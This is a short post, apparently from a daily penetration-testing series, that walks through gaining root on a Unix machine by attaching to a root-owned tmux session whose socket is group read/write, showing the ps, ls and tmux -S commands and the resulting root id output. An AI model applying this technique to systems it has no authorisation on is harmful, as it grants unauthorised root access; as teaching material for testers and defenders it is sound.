Day 69: Hijacking Tmux Sessions 2 Priv. Esc.

Tmux

Tmux is a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window. It is useful for running more than one command-line program at the same time

Tmux can be prone to a local privilege-escalation vulnerability because it fails to properly drop group permissions obtained through setGID.

There was a great advisory some years back where you could just run -S with anything…

tmux 1.3 / 1.4 Privilege Escalation

Using Tmux to Priv. Esc.

Look for root /usr/bin/tmux running process that allows our group to rw in order to hijack root shell

Check for process…

user@box:/# ps -u root
/usr/bin/tmux -S /.devs/dev_sess

Check we can read/write…

user@box:/# ls -la /.devs/dev_sess
srw-rw---- 1 root usergroup

Now do the same command you see running in your user terminal that has group membership allowing rw to attach to the session…

user@box:/# tmux -S /.devs/dev_sess
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)